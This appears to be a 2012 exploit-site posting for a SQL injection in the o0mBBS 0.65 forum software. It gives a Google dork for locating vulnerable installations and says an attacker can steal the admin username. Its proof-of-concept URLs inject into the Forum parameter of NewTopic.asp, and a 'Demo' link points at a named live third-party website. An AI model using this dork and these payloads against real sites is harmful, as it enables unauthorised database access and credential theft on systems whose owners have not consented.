# --------------------------------------- # Author : L3b-r1'z Title : o0mBBS Sql Injection Date : 6/12/2012 Email : L3br1z@Gmail.com Site : Sec4Ever.com & Exploit4arab.com Google Dork : allintext: "o0mBBS version 0.65B" Version : 0.65 # --------------------------------------- # 1) Bug 2) PoC # --------------------------------------- # 2) Bug : Attacker Can Injection Database And Steal The Username And Admin. # --------------------------------------- # 3) PoC : http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=[SQL] http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=2' Demo : http://www.oasitech.it/o0m/NewTopic.asp?Type=NewTopic&Forum=2%27 # --------------------------------------- # Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID , Abu Hamid Madridi. # --------------------------------------- #